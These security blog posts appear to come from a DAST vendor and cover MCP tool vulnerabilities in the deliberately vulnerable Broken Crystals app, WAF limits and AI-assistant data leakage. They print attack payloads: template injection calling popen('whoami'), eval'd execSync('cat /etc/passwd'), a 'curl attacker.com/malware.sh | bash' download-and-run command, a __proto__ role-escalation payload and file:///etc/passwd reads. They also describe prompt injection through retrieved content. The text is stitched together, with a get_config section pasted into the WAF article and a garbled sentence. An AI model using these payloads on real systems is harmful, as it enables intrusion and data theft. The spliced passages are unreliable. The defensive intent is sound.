When MCP Trust Boundaries Break: 3 Silent but Critical Risks

Table of Contents

  1. Introduction
  2. Server-Side File Read via get_metadata.
  3. User Enumeration via search_users
  4. Prototype Pollution via update_user
  5. What These Three Paths Have in Common
  6. How to Prevent MCP Trust Boundary Failures
  7. Conclusion

Introduction

MCP servers are designed to enforce structure. They define typed tools, document expected inputs, and separate public access from admin privileges. That structure can create an impression of safety: if the tools are well-defined and the roles are clear, the integration must be under control.

That impression is wrong. Structure does not equal safety. An MCP tool can be perfectly typed, clearly documented, and still violate fundamental trust boundaries. When the tool proxies backend behavior that mishandles external input, exposes too much data, or blindly trusts attacker-controlled payloads, the MCP layer inherits every one of those failures and makes them easier to reach.

Broken Crystals demonstrates this with three tools that look routine but silently break critical trust boundaries: get_metadata, search_users, and update_user. None of them executes code or spawns processes. None of them requires admin access. All three are public MCP capabilities that any connected agent or client can discover and call after a single initialization handshake.

That is what makes trust boundary failures in MCP dangerous. They do not announce themselves. There is no error, no crash, no obvious sign that something went wrong. The tool returns a clean response, and the boundary has already been crossed.

1. Server-Side File Read via get_metadata

The get_metadata tool is exposed as a public MCP capability. Its contract is simple: accept an XML string and return parsed output. Under the hood, it proxies the user-supplied XML directly into the backend XML parser with external entity processing enabled.

That configuration is the problem. The backend XML parser resolves external entities, which means the caller can define an entity that points to a local file and have its contents included in the parsed output. In practice, a single call to get_metadata can retrieve sensitive server-side files like /etc/passwd or application configuration files.

This is a textbook XML External Entity attack, but MCP changes the threat model. The attacker does not need to find an obscure XML upload form or intercept a SOAP request. The tool is listed in the MCP capability set, the input schema says it accepts an XML string, and the response comes back structured and ready to parse. An AI agent or automated workflow can discover and exploit this without any prior knowledge of the backend.

The trust boundary that breaks here is between external input and internal resources. The MCP tool accepts untrusted XML from any connected client and passes it to a parser configured to resolve references to the local filesystem. The tool treats the XML as data. The parser treats it as instructions.

The fix is to disable external entity resolution entirely. If an MCP tool must accept XML, it should never allow the input to reference external resources, local files, or internal network endpoints.

2. User Enumeration via search_users

If get_metadata breaks the boundary between input and internal resources, search_users breaks the boundary between public and private data.

In Broken Crystals, search_users is a public MCP tool that accepts a name prefix and returns matching users. Moreover, the tool has no authentication requirement – any MCP session, including an unauthenticated guest session, can call it.

The deeper problem is not just that the tool is open. It is what it returns. Instead of a minimal result like a display name, the response includes email addresses, phone numbers, internal identifiers, and other fields that should never be exposed to unauthenticated callers. A single call with a short prefix like “name”: “a” can return dozens of complete user records.

This is broken access control in its most common form: the data exists, the tool returns it, and nothing in between enforces who should see it. But MCP amplifies the risk. An AI agent with MCP access can call search_users programmatically, iterate through name prefixes, and enumerate the entire user directory in seconds. The tool is discoverable through tools/list, the input is a single string, and the output is structured JSON ready for downstream processing.

That matters because user enumeration is rarely the end goal. It is the first step in credential stuffing, phishing, privilege escalation, and social engineering. Once an attacker has a full user directory – names, emails, phone numbers, internal IDs – every other attack becomes easier to target.

The fix requires two changes. First, the tool must enforce authentication. Public MCP tools should not return user data to unauthenticated sessions. Second, the output must be minimized. Even authenticated callers should receive only the fields necessary for the specific use case, not the full internal user record.

3.  Prototype Pollution via update_user

The most subtle trust boundary failure in the MCP layer is update_user.

Broken Crystals exposes a public MCP tool that accepts a JSON payload with user fields like name, email, username, and phone. The tool picks those allowed fields from the input and includes them in the response. That sounds safe. But the implementation also processes the __proto__ key in the payload and merges whatever it contains into the returned object.

This means an attacker can call update_user with a payload that includes “__proto__”: {“role”: “admin”}, and the response will include the new role alongside the legitimate fields. The tool does not validate, filter, or reject the __proto__ key. It treats attacker-controlled prototype fields as first-class output.

This is prototype pollution exposed through an agent-facing interface. In traditional web applications, prototype pollution typically requires finding an unsafe merge or copy operation buried deep in the code. In MCP, the tool explicitly accepts and returns polluted properties. The attack does not require any guesswork. The caller simply includes __proto__ in the payload, and the tool cooperates.

The risk extends beyond the immediate response. If any downstream consumer of this tool’s output uses the returned object for authorization checks, configuration, or further processing, the injected properties can alter application logic. A role: “admin” field that appears in the response because of prototype pollution can become a real privilege escalation if the consuming code does not distinguish between legitimate and injected properties.The fix is straightforward: never process __proto__ from user-controlled input. MCP tools should explicitly allowlist the fields they accept and return, and strip any key that can manipulate the object prototype chain before processing.

What These Three Paths Have in Common

These issues are different technically, but they share the same architectural problem: MCP tools that silently cross trust boundaries because the backend behavior they proxy was never designed to be agent-facing.

get_metadata breaks the boundary between external input and internal resources. search_users breaks the boundary between public access and private data. update_user breaks the boundary between trusted structure and attacker-controlled object properties. In each case, the underlying vulnerability is well-known. What changes with MCP is that these vulnerabilities are wrapped in a discoverable, typed, and callable interface that any connected client can reach.

None of these tools requires admin access. None of them produces errors or warnings when exploited. The responses come back clean and structured, which makes the boundary violations invisible to casual inspection and easy to chain into larger workflows.

That is why trust boundary analysis matters at the MCP layer. If a tool can read local files, expose user records, or accept prototype-polluted payloads, those are not backend problems that MCP inherits passively. They are MCP-layer risks that need to be reviewed, tested, and mitigated directly.

How to Prevent MCP Trust Boundary Failures

Start by treating every MCP tool as its own trust boundary, not as a transparent proxy to something behind it. Treat every tool input as untrusted, every tool output as a data exposure decision, and every public tool as a potential entry point for enumeration and chaining.

More specifically: review what each tool proxies and whether the backend behavior was designed for the access level the MCP tool grants. A backend endpoint that was built for authenticated internal use does not become safe because an MCP tool definition calls it “public.” A parser configuration that was acceptable for server-to-server communication is not acceptable when the input comes from an unauthenticated agent session.

Most importantly, test the MCP tools for trust boundary violations directly. Broken Crystals is valuable because it demonstrates these failures end-to-end: unauthenticated sessions calling public tools, structured inputs crossing into internal resources, and clean responses that reveal exactly how much was exposed. That is the level where real agent security problems appear – not in the tool definition, but in what the tool actually does when called.

Conclusion

Trust boundary failures through MCP do not require sophisticated exploits or novel attack techniques. They happen when existing backend behavior is exposed through an interface designed for discovery, automation, and structured interaction. That makes familiar weaknesses silent, scalable, and easy to chain.

For teams adopting MCP, the takeaway is clear: do not assume that tool definitions enforce safety. Review what each tool proxies, restrict what it returns, and validate what it accepts. If security validation only covers the backend API layer, the most important trust boundary failures may still be sitting in the MCP tools above it, waiting for the first agent to call tools/list.

From MCP Tool Call to Code Execution: 3 Exploitation Patterns

Table of Contents

  1. Introduction
  2. Remote Code Execution via render.
  3. Arbitrary Code Execution via process_numbers
  4. OS-Level Code Execution via spawn_process
  5. What These Three Paths Have in Common
  6. How to Prevent Code Execution Through MCP
  7. Conclusion

Introduction

MCP endpoints are often described as a safe abstraction layer for AI agents – a way to define clear boundaries between what agents can call and what they cannot. But when those boundaries wrap unsafe code execution patterns, they become something else entirely: a structured attack surface for remote code execution.

Broken Crystals demonstrates this risk at scale. Its MCP endpoint exposes tools designed to render content, process data, and execute system operations. Each tool sounds like a legitimate business function. In practice, there are three different pathways to arbitrary code execution on the server.

The critical insight is this: exposing code execution behavior through an agent-callable interface does not make it safer. It makes it more dangerous. Once a tool is documented, discoverable, and invocable through MCP, an attacker no longer needs to find a hidden route or exploit a complex dependency chain. The execution primitive is already available, and the only question is how to invoke it.

Three of the most exploitable tools in Broken Crystals are render, process_numbers, and spawn_process. They look like utility functions. In reality, they create three different paths to running arbitrary code on the server.

1. Remote Code Execution via render

The render tool is exposed as a public MCP capability. Its contract appears straightforward: accept a template string and return rendered output. Under the hood, though, it passes the user-supplied template directly into a server-side rendering engine without sanitization.

That design turns the MCP tool into a code execution primitive. Instead of restricting the caller to a fixed template with predefined variables, it lets the caller decide what template syntax gets executed. For example, the tool can be called with a template string containing server-side template injection payloads like {{ import(‘os’).popen(‘whoami’).read() }} or equivalent syntax for the underlying engine, and the response comes back with the command output embedded in the rendered result.

This is a complete remote code execution vulnerability, but MCP makes it frictionless. An AI agent, attacker, or compromised integration does not need to understand the backend rendering engine in detail or find an obscure request parameter. The tool is already documented, the MCP interface is already initialized, and calling it requires only knowing the tool name and passing a malicious template.

The fix is not to “validate the template input more carefully.” It is to stop executing user-supplied code as templates at all. MCP tools should accept structured business parameters – like template names and variable dictionaries—not raw code that will be evaluated server-side..

2. Arbitrary Code Execution via process_numbers

If render shows how MCP can enable code execution through template injection, process_numbers shows how it can happen through JavaScript evaluation.

In Broken Crystals, process_numbers is an authenticated MCP tool designed to transform numeric arrays. The implementation accepts a user-supplied JavaScript function string, passes it to eval(), and executes it in the server context. Even though the tool name and description suggest it handles only numeric operations. In reality, it executes arbitrary JavaScript in the server context.

An attacker with MCP access can call this tool with a payload like function(arr) { require(‘child_process’).execSync(‘cat /etc/passwd’); return arr; } or similar JavaScript that accesses the full Node.js runtime. The function runs with the privileges of the server process, and any file it can read, any external command it can invoke, or any service it can reach becomes accessible.

This is a common failure mode in AI integrations that accept dynamic code. Teams assume that wrapping the code execution in a tool definition somehow makes it controlled. But once the tool is exposed through MCP, that assumption breaks down. An agent or attacker who can call the tool can escalate to full system compromise.

The lesson is straightforward: never accept code to be evaluated as user input, especially not through an agent-facing interface. If a tool must perform dynamic operations, it should accept declarative parameters that map to a fixed set of safe operations, not arbitrary code that runs in the server context.

3. OS-Level Code Execution via spawn_process

The most direct code execution vulnerability in the MCP layer is spawn_process.

Broken Crystals exposes a utility tool that accepts a command string and optional arguments, then executes them as a system process. The tool returns the process output. The implementation passes these parameters directly to a process spawning function without filtering or restricting the command set.

This is classic OS command injection. An attacker can call spawn_process with arbitrary shell commands—for example, “command”: “curl attacker.com/malware.sh | bash” downloads and executes a malicious script on the server in a single call. The MCP interface does nothing to prevent or detect these calls. The command executes with the privileges of the application server, potentially including filesystem write access, network outbound permissions, and the ability to modify system state.

That matters because system process execution is rarely sandboxed in real environments. A tool like this can delete files, exfiltrate data, modify configurations, establish reverse shells, or deploy malware. Once command execution is available through an agent-facing interface, the MCP server has effectively become a remote code execution endpoint.

The right fix is to avoid exposing raw system command execution through MCP entirely. If process invocation is necessary for legitimate business logic, it should be wrapped in a whitelist: predefined commands with fixed argument positions, no dynamic command names, and no shell metacharacter expansion.

What These Three Paths Have in Common

These vulnerabilities are different technically, but they share the same architectural problem: MCP is wrapping code execution primitives in a discoverable interface built for automation.

render leaks through template injection. process_numbers leaks through JavaScript evaluation. spawn_process leaks through command-line execution. In each case, the underlying vulnerability – server-side code execution- is familiar. What changes with MCP is the delivery mechanism. Dangerous functionality becomes easier to find, easier to invoke, and easier to chain into larger attack flows.

An agent that can call render can compromise the server. An agent that can call process_numbers can steal secrets. An agent that can call spawn_process can take full control. From a defensive perspective, the critical difference between these tools and a hidden vulnerability in the backend is that these tools are part of the published MCP contract. Testing them is part of the standard integration flow.

That is why MCP endpoints need their own code execution review, not just inherited trust from the APIs behind them. Once a tool is published to an agent, it becomes part of the attack surface.t.

How to Prevent Code Execution Through MCP

Start with the basics, but apply them at the MCP layer itself.

Do not expose template engines as tool parameters. Do not accept code to be evaluated as user input. Do not expose raw system command execution. Treat every tool definition as a privilege decision, every MCP session as its own trust boundary, and every agent invocation as a potential attack.

More specifically: if a tool sounds like it “executes” something – whether it is rendering, processing, spawning, or evaluating – it is a red flag. Tools should describe high-level business operations, not low-level code execution. If you need dynamic behavior, implement it as fixed code paths, not as user-supplied instructions that the tool then runs.

Most importantly, test MCP directly for code execution paths. Broken Crystals is valuable because it demonstrates these vulnerabilities end-to-end: tool enumeration, argument construction, invocation, execution, and output capture. That is the level where real agent security problems appear – not in isolation, but in the actual tool-calling flow.

Conclusion

Code execution vulnerabilities through MCP do not require a new class of AI-specific attack. They happen when existing dangerous behavior is exposed through an interface designed for discovery, automation, and chained execution. That makes familiar weaknesses far more practical to exploit.

For teams adopting MCP, the takeaway is clear: treat code execution as a special case in agent-facing integrations. If a tool can execute code of any kind, it should not be exposed through MCP at all. Review what your tools execute, eliminate unnecessary execution primitives, and injection test carefully.

If security validation stops at the underlying API layer and does not extend to the MCP tools themselves, the most critical risks may still be sitting in the agent-facing interface above it.

WAF Bypass Reality Check: Why a Better DAST Still Matters Even If You Have a WAF

Most security teams have had this conversation at some point:

“We already have a WAF in front of the app. Aren’t we covered?”

It’s a fair question. WAFs are widely deployed, they show up in audits, and they’re often treated as a checkbox that proves web risk is being handled.

The problem is that modern application risk doesn’t live where most people think it does. The vulnerabilities that cause real incidents today aren’t always loud injection payloads hitting public endpoints. They’re often quiet workflow failures, permission gaps, authenticated abuse paths, and API behaviors that don’t look malicious until it’s too late.

A WAF helps. It’s not useless. But treating it as a substitute for runtime security validation is where teams get burned.

That’s why DAST still matters – and why buying a better DAST matters even when you already have perimeter controls.

Table of Contents

  1. The False Comfort of “We Have a WAF”
  2. What a WAF Actually Does (And What It Doesn’t).
  3. Sensitive Data Exposure via get_config
  4. Why WAF Bypass Isn’t Rare – It’s Normal
  5. The Vulnerabilities WAFs Don’t Catch
  6. Why “We’ll Tune the WAF” Usually Fails
  7. Where DAST Fits Differently
  8. Procurement Traps: How Vendors Blur the Lines
  9. What to Demand in a Modern DAST Tool
  10. Where Bright Fits (Without Replacing Your WAF)
  11. Buyer FAQ: WAF vs DAST in 2026
  12. Conclusion: A WAF Is a Shield – DAST Is Proof

The False Comfort of “We Have a WAF”

WAFs are easy to over-trust because they sit in a comforting place in the architecture: right at the edge.

They’re visible. They’re marketable. They give you dashboards. They block some bad traffic. They make leadership feel like there’s a wall between attackers and the application.

But attackers don’t approach applications like compliance teams do.

They don’t care that you have a WAF. They care about whether they can:

  1. Access data they shouldn’t
  2. Abuse a workflow
  3. Escalate privileges
  4. Extract sensitive information through APIs
  5. Trigger unintended behavior inside the app

And most of that happens after the perimeter.

The modern question isn’t “Do we have a WAF?”

It’s: Do we know what is exploitable in the running application?

That’s a different category of assurance.

What a WAF Actually Does (And What It Doesn’t)

A Web Application Firewall is fundamentally a traffic control layer.

It inspects inbound requests and tries to block patterns that resemble known attacks: injection payloads, suspicious headers, malformed inputs, automated scanners, things like that.

That’s useful.

But it’s also limited in ways buyers don’t always internalize.

A WAF does not:

  1. Understand business logic
  2. Validate authorization rules
  3. Reason about user roles
  4. Test workflows end-to-end
  5. Confirm whether a vulnerability is actually exploitable
  6. Tell you what happens inside authenticated sessions

Most WAFs operate with conservative tuning because false blocks are expensive. Blocking a real customer’s checkout request is not a theoretical problem. It’s a revenue loss.

So in practice, WAFs tend to block the obvious stuff and allow everything else.

Which is exactly where real risk lives.

Sensitive Data Exposure via get_config

If get_count shows how MCP can leak data by executing unsafe queries, get_config shows how it can leak secrets by simply returning too much.

In Broken Crystals, get_config is an admin-only tool, but that does not make it safe. The implementation proxies /api/config, and unless include_sensitive is explicitly set to false, it returns the full configuration object. In other words, sensitive output is the default behavior.

The example response in the repo includes an S3 bucket URL, a PostgreSQL connection string, and a Google Maps API key. That is exactly the kind of data security teams try to keep out of logs, frontends, test fixtures, and support tooling. Exposing it through MCP means any agent or workflow with admin-level MCP access can retrieve it in one structured call.

This is a common failure mode in AI integrations. Teams assume the main risk is unauthorized public access. But over-privileged internal access is often the more realistic problem. If an agent is granted broad admin permissions for convenience, or if an authenticated MCP session is compromised, a configuration tool like this can leak credentials, infrastructure locations, service URLs, and third-party keys immediately.

The lesson is straightforward: admin-only is not a substitute for output minimization. Sensitive config should never be the default payload of an MCP tool. If a tool must exist at all, it should return a tightly redacted view designed for that specific use case.

Why WAF Bypass Isn’t Rare – It’s Normal

“WAF bypass” sounds like a headline. Like something advanced attackers do.

In reality, bypassing WAF protections is often just the default outcome of how modern applications work.

Attackers don’t need to smash through the front door if the building has side entrances.

Common bypass realities include:

  1. Payload obfuscation and encoding
  2. API-first attack surfaces where WAF rules are weak
  3. Authenticated abuse where traffic looks legitimate
  4. Multi-step workflows that don’t trigger signature rules
  5. Logic flaws that contain no malicious strings at all

The truth is uncomfortable:

WAFs block patterns. Attackers exploit behavior.

Those are not the same thing.

The Vulnerabilities WAFs Don’t Catch

This is where most AppSec programs get surprised.

The biggest gaps are not theoretical. They show up in real breach reports constantly.

Broken Access Control Doesn’t Trigger a WAF

One of the most damaging classes of vulnerabilities today is access control failure.

For example:

  1. User A can access User B’s invoice
  2. A patient portal leaks another patient’s records
  3. An internal admin API is reachable with normal credentials

Nothing about those requests looks malicious.

The payload is clean. The endpoint is valid. The session is real.

The vulnerability is in authorization logic, not syntax.

A WAF cannot tell whether someone should be allowed to see that data. It only sees traffic, not intent.

Business Logic Abuse Looks Like Normal Usage

Logic flaws don’t announce themselves.

Attackers abuse workflows like:

  1. Skipping payment steps
  2. Replaying discount codes
  3. Manipulating onboarding sequences
  4. Exploiting race conditions in multi-step actions

These are not “bad payloads.”

They are valid actions chained in unexpected ways.

No perimeter rule set can reliably detect that without breaking legitimate users.

Authenticated Attacks Walk Through Every Time

A lot of security tooling is strongest before login.

But most real attackers don’t stay anonymous.

They:

  1. compromise credentials
  2. create accounts
  3. abuse partner access
  4. exploit low-privilege footholds

Once traffic is authenticated, it blends in.

WAFs do not magically become behavioral security engines inside user sessions.

APIs and GraphQL Reduce WAF Effectiveness

Modern applications are API-driven.

That means:

  1. fewer predictable endpoints
  2. more dynamic request shapes
  3. more complexity hidden behind a single gateway

GraphQL, especially, is a procurement trap. Vendors will claim “GraphQL support” when they really mean “we don’t break it.”

WAFs struggle here because signatures don’t map cleanly to schema-driven behavior.

Why “We’ll Tune the WAF” Usually Fails

This is one of the most common organizational delusions.

Teams assume that if something slips through, they can just tune rules harder.

In practice:

  1. Tuning is endless
  2. Ownership is unclear
  3. Strict rules break real users
  4. Loose rules provide false confidence

Most WAF deployments end up in a middle zone:

Not aggressive enough to stop real abuse
Too fragile to lock down further
Still treated as a security control

That’s not a strategy. That’s drift.

Where DAST Fits Differently

DAST is not a perimeter filter.

DAST is runtime validation.

It answers a different question:

If an attacker interacts with this application, what can they actually exploit?

DAST tests the application the way attackers do:

  1. through real endpoints
  2. with real sessions
  3. across workflows
  4. observing responses
  5. validating exploit paths

DAST finds what WAFs can’t:

  1. access control failures
  2. authentication weaknesses
  3. workflow abuse
  4. API exposure
  5. multi-step exploitability

This is why modern teams don’t replace WAFs with DAST.

They use DAST to prove what still exists behind the WAF.

Procurement Traps: How Vendors Blur the Lines

When buyers evaluate AppSec tools, vendors love vague overlap.

Watch for these traps:

“Our WAF Includes Scanning”

Most WAF scanning is shallow, unauthenticated, and signature-based.

That is not application security validation.

“Our DAST Replaces Pen Testing”

No. DAST reduces gaps. It doesn’t replace adversarial testing.

“We Support Modern Apps”

Ask what that means:

  1. SPAs?
  2. OAuth flows?
  3. GraphQL?
  4. WebSockets?
  5. Multi-step authenticated workflows?

Marketing language is cheap. Capability isn’t.

“We Have Low False Positives”

Ask how they prove exploitability.

Noise reduction only matters if findings are validated.

What to Demand in a Modern DAST Tool

If you’re buying in 2026, the baseline questions should include:

  1. Can it scan authenticated applications reliably?
  2. Does it handle APIs, not just websites?
  3. Can it validate exploitability, not just detect patterns?
  4. Does it retest fixes automatically?
  5. Can it run continuously in CI/CD without disruption?
  6. Does it support production-safe scanning modes?

DAST procurement is no longer about “do you scan OWASP Top 10.”

It’s about whether you can operationalize runtime security without drowning engineers.

Where Bright Fits (Without Replacing Your WAF)

Bright’s approach is aligned with how risk actually shows up today: at runtime.

Instead of producing long theoretical lists, Bright focuses on validating what is exploitable in real application behavior.

That matters especially in environments where:

  1. WAFs are already deployed
  2. Applications are API-heavy
  3. AI-generated code increases unpredictability
  4. Teams need proof, not noise

Bright isn’t a perimeter replacement.

It’s the layer that helps teams answer: What’s still real behind the edge controls?

Buyer FAQ: WAF vs DAST in 2026

Does a WAF replace DAST?
No. A WAF blocks some inbound patterns. DAST validates runtime exploitability.

If we have a WAF, what’s the point of scanning?
Because most serious vulnerabilities aren’t blocked at the edge. They live in authorization, workflows, APIs, and authenticated behavior.

Can a WAF stop prompt injection or AI logic abuse?
Not reliably. These are semantic and behavioral issues, not signature payloads.

What’s the biggest mistake teams make in procurement?
Assuming overlap means redundancy. WAF and DAST solve different problems.

What should leadership care about?
Evidence. Knowing which vulnerabilities are exploitable and whether fixes actually worked.

Conclusion: A WAF Is a Shield – DAST Is Proof

WAFs are useful. They reduce noise at the perimeter. They block obvious attacks. They belong in modern architecture.

But they do not tell you what is exploitable inside the application.

And that’s the gap attackers live in.

The vulnerabilities that matter most today are rarely loud. They are behavioral, authenticated, workflow-driven, and API-native. They don’t look like classic payloads. They look like normal usage – until they aren’t.

That’s why DAST still matters. Not as a checkbox. Not as a report generator. As runtime proof.

If your security strategy stops at the edge, you will always discover risk too late. The teams that win are the ones that validate continuously, prioritize what’s real, and treat runtime behavior as the source of truth.

A WAF is a shield. DAST is the reality check. And in 2026, you need both.

How MCP Endpoints Leak Sensitive Data: 3 High-Impact Paths

Table of Contents

  1. Introduction
  2. SQL Injection via get_count.
  3. Sensitive Data Exposure via get_config
  4. Local File Inclusion via resources/read
  5. What These Three Paths Have in Common
  6. How to Prevent MCP Data Leaks
  7. Conclusion

Introduction

MCP servers are often presented as a clean interface for AI agents to discover tools and interact with applications. That framing can be misleading. In practice, an MCP endpoint is still an application surface, and if its tools proxy unsafe backend behavior, it can become a highly efficient data-exposure layer.

Broken Crystals shows this clearly. Its MCP endpoint at /api/mcp uses a separate initialize step, issues its own Mcp-Session-Id, and then allows clients to enumerate tools and resources before invoking them. Once that session is established, the question is no longer just whether the app has vulnerabilities. The question is which of those vulnerabilities have been wrapped into agent-friendly capabilities.Three of the most important examples in this repo are get_count, get_config, and resources/read. They look like convenient tools. In reality, they create three different paths to sensitive data leakage.

SQL Injection via get_count

The get_count tool is exposed as a public MCP capability. Its contract is simple: accept a query string and return a count. Under the hood, though, it proxies the user-supplied value directly into /api/testimonials/count and returns the raw result as text.

That design turns the MCP tool into a database disclosure primitive. Instead of restricting the caller to a fixed counting operation, it lets the caller decide what SQL gets executed. For example, the tool can be called with a simple SQL query select count(table_name) as count from information_schema.tables, and the response comes back as a query result. That is already a leak: it exposes database metadata and confirms the caller can query internal schema information rather than just count testimonials.

This is why SQL injection through MCP matters even when the tool name sounds harmless. An AI agent, attacker, or compromised integration does not need to know hidden routes or reverse engineer the backend. The tool is already documented, discoverable, and callable through the MCP flow.

The fix is not to “watch the prompts” more carefully. It is to stop accepting raw SQL as tool input. MCP tools should expose typed business parameters, not backend query language.

Sensitive Data Exposure via get_config

If get_count shows how MCP can leak data by executing unsafe queries, get_config shows how it can leak secrets by simply returning too much.

In Broken Crystals, get_config is an admin-only tool, but that does not make it safe. The implementation proxies /api/config, and unless include_sensitive is explicitly set to false, it returns the full configuration object. In other words, sensitive output is the default behavior.

The example response in the repo includes an S3 bucket URL, a PostgreSQL connection string, and a Google Maps API key. That is exactly the kind of data security teams try to keep out of logs, frontends, test fixtures, and support tooling. Exposing it through MCP means any agent or workflow with admin-level MCP access can retrieve it in one structured call.

This is a common failure mode in AI integrations. Teams assume the main risk is unauthorized public access. But over-privileged internal access is often the more realistic problem. If an agent is granted broad admin permissions for convenience, or if an authenticated MCP session is compromised, a configuration tool like this can leak credentials, infrastructure locations, service URLs, and third-party keys immediately.

The lesson is straightforward: admin-only is not a substitute for output minimization. Sensitive config should never be the default payload of an MCP tool. If a tool must exist at all, it should return a tightly redacted view designed for that specific use case.

Local File Inclusion via resources/read

The most direct data leak in the MCP layer is resources/read.

Broken Crystals exposes a resource model that accepts file:// URIs and proxies them into /api/file/raw. The implementation parses the URI, extracts the path, and returns the file contents. The resource can expose sensitive information from files like file:///etc/hosts or file:///etc/passwd, which is a critical security breach.

This is classic local file inclusion, but MCP makes it easier to operationalize. The caller does not need a browser exploit, path traversal trick, or guesswork about an upload directory. It can simply call resources/list, see that local file access exists, and then invoke resources/read with a server-side file URI.

That matters because local files are rarely just harmless system text. In real environments, file access can expose application configs, environment files, service credentials, SSH material, cloud metadata, and signing keys. Once file read is available through an agent-facing interface, the MCP server has effectively become a controlled exfiltration channel.

The right fix is to avoid exposing raw filesystem access through MCP in the first place. Resources should be virtualized, explicitly allowlisted, and mapped to safe application objects, not arbitrary local paths.

What These Three Paths Have in Common

These issues are different technically, but they share the same architectural problem: MCP is wrapping sensitive backend behavior in a discoverable interface built for automation.

get_count leaks through unsafe query execution. get_config leaks through overbroad secret exposure. resources/read leaks through direct file access. In each case, the underlying bug is familiar. What changes with MCP is the delivery mechanism. The dangerous functionality becomes easier to find, easier to invoke, and easier to chain into larger attack flows.

That is why MCP endpoints need their own AppSec review, not just inherited trust from the APIs behind them. Once a tool or resource is published to an agent, it becomes part of the attack surface.

How to Prevent MCP Data Leaks

Start with the basics, but apply them at the MCP layer itself.

Do not expose backend query languages as tool parameters. Do not return sensitive configuration by default. Do not map raw local paths into MCP resources. Treat every tool definition as a privilege decision, every resource as a data exposure decision, and every MCP session as its own trust boundary.

Most importantly, test MCP directly. Broken Crystals is valuable because it demonstrates these paths end to end: session initialization, role checks, tool invocation, resource reads, and concrete leaked outputs. That is the level where real agent security problems appear.

Conclusion

Sensitive data leakage through MCP does not just require a new class of AI-specific vulnerability. It may happen when existing application behavior is exposed through an interface designed for discovery, automation, and chained execution. That makes familiar weaknesses far more usable in practice.

For teams adopting MCP, the takeaway is straightforward: treat agent-facing integrations as first-class attack surfaces. Review what they expose, minimize the data they return, and test them directly. If security validation stops at the underlying API layer, the most important risks may still be sitting in the MCP layer above it.

Is Your AI Assistant Leaking Secrets? A Look at Data Exfiltration in Code Generation

Table of Content

  1. Introduction
  2. What Data Exfiltration Means in AI-Assisted Development
  3. Where the Leaked Data Comes From
  4. The Two-Way Mirror of Code Generation
  5. Logging, Telemetry, and the Long Memory Problem
  6. Prompt Injection as an Exfiltration Multiplier
  7. AI-Generated Code as an Unreviewed Dependency
  8. Why Traditional AppSec Controls Miss This Entirely
  9. What Actually Helps Reduce AI-Driven Data Leakage
  10. Where Runtime AppSec Fits Into AI Development
  11. Conclusion: AI Does Not Steal Data – It Reveals It

Introduction

AI coding assistants didn’t arrive with a big announcement. They simply slipped into everyday development. One plugin here, one PR suggestion there, and suddenly they’re part of how code gets written. In a lot of teams, they’re no longer helping on the margins – they’re contributing real chunks of production logic. What’s striking is how quickly that happened, and how little scrutiny it received compared to things like new infrastructure, vendors, or libraries.

The risk isn’t that these tools are unsafe by default. It’s that they quietly change the way information moves during development. Code generation creates exposure paths that don’t look like classic security incidents. Nothing crashes. No system gets “hacked.” There’s no clear attacker to point to. Instead, bits of sensitive context drift out over time through everyday actions – pasting code to debug an error, sharing configuration to fix a warning, or accepting generated output that reflects internal structure.

That’s what makes this kind of leakage so hard to spot. It doesn’t feel like a security event. It feels like normal work. And because it blends in with legitimate developer activity, most existing security controls simply aren’t built to notice it.

What Data Exfiltration Means in AI-Assisted Development

When people hear “data exfiltration,” they usually think of compromised servers or malicious insiders. AI-assisted development breaks that mental model. Here, data leakage often happens without anyone trying to steal anything.

Every interaction with a code generation model involves context. That context may include snippets of source code, error messages, configuration details, database schemas, or even full files pasted in for help. From the developer’s perspective, this feels no different than asking a colleague for advice. From a security perspective, it is a form of outbound data flow.

The key difference is scale. A developer might paste a few lines of code once or twice. Within a typical engineering organization, an AI assistant ends up absorbing a steady stream of everyday interactions. None of them raises alarms on their own. It’s a config pasted to fix a build. A function shared to speed up a review. A quick clarification about how an internal service works. All perfectly normal in isolation.

The risk shows up over time. When those small pieces are viewed together, patterns start to form. Architecture decisions become easier to infer. Naming conventions repeat. Common logic paths emerge. And occasionally, something more sensitive slips through – not because anyone was careless, but because the boundary between helpful context and too much information isn’t always obvious in the moment.

This is not a failure of policy. It is a mismatch between how security teams think about data loss and how AI tools actually operate.

Where the Leaked Data Comes From

Most organizations underestimate how much information gets shared during routine code generation. It is rarely a single obvious secret. Instead, leakage accumulates across several sources.

Developers paste internal code to ask for refactoring suggestions or explanations. They include stack traces that expose file paths, framework versions, or internal service names. They share configuration fragments to debug errors. In some cases, API keys or tokens slip in because they’re just for now.

The result is a steady stream of internal signals leaving the environment under the banner of productivity.

The Two-Way Mirror of Code Generation

NOne of the most common mistakes teams make is placing all security scans at the same point in the pOne of the hardest things for security teams to internalize is that AI code generation is not a one-way interaction. Developers send context in, but they also receive output that reflects what the model has inferred.

Generated code often mirrors internal conventions. It reproduces naming patterns, architectural assumptions, and access logic that feel familiar. That familiarity builds trust. But it also means that internal structure is being externalized, even if no single prompt contained enough information to reconstruct it.

From an attacker’s point of view, this is valuable. Even without direct access to prompts, observing generated outputs can reveal how systems are designed. Over time, these signals can be combined to understand trust boundaries, data flows, and potential weak points.

This is why data exfiltration in AI tooling does not need a malicious actor. The system leaks by design, through normal use.

Logging, Telemetry, and the Long Memory Problem

Another overlooked risk lies in what happens after prompts are sent. Many AI systems log interactions for debugging, quality, or compliance purposes. Prompts and outputs may be stored temporarily or retained longer than teams expect.

Even when vendors claim they do not train models on customer data, that does not mean data is never stored. Logs, embeddings, and telemetry can persist across environments. Once sensitive information enters those systems, control over its lifecycle becomes unclear.

For regulated industries, this creates compliance challenges. For security teams, it creates blind spots. Data that leaves the application through AI tooling often bypasses traditional DLP controls entirely.

Prompt Injection as an Exfiltration Multiplier

Prompt injection is usually discussed as a way to manipulate model behavior. In practice, it also amplifies data leakage.

When AI systems retrieve documents, parse emails, or process external content, attackers can hide instructions inside that data. The model may then surface information it was never meant to expose, not because it was hacked, but because it followed instructions embedded in a trusted context.

This is particularly dangerous in environments where models have access to internal knowledge bases or operational tools. Injection does not need to break anything. It only needs to redirect attention.

Traditional security testing struggles here because nothing looks malformed. Requests are valid. Responses are expected. The harm happens at the semantic level.

AI-Generated Code as an Unreviewed Dependency

Another factor that increases risk is how generated code is treated after it appears. In many teams, AI output skips the same scrutiny applied to third-party libraries or hand-written logic.

Generated code often “looks right.” It compiles. It follows conventions. It passes basic tests. But it may also embed insecure defaults, overly permissive access checks, or assumptions that do not hold in production.

Because the code came from a trusted assistant, developers may not question it as aggressively. Over time, insecure patterns propagate quietly. This is not a failure of developers. It is a cognitive effect of working with tools that feel authoritative.

Why Traditional AppSec Controls Miss This Entirely

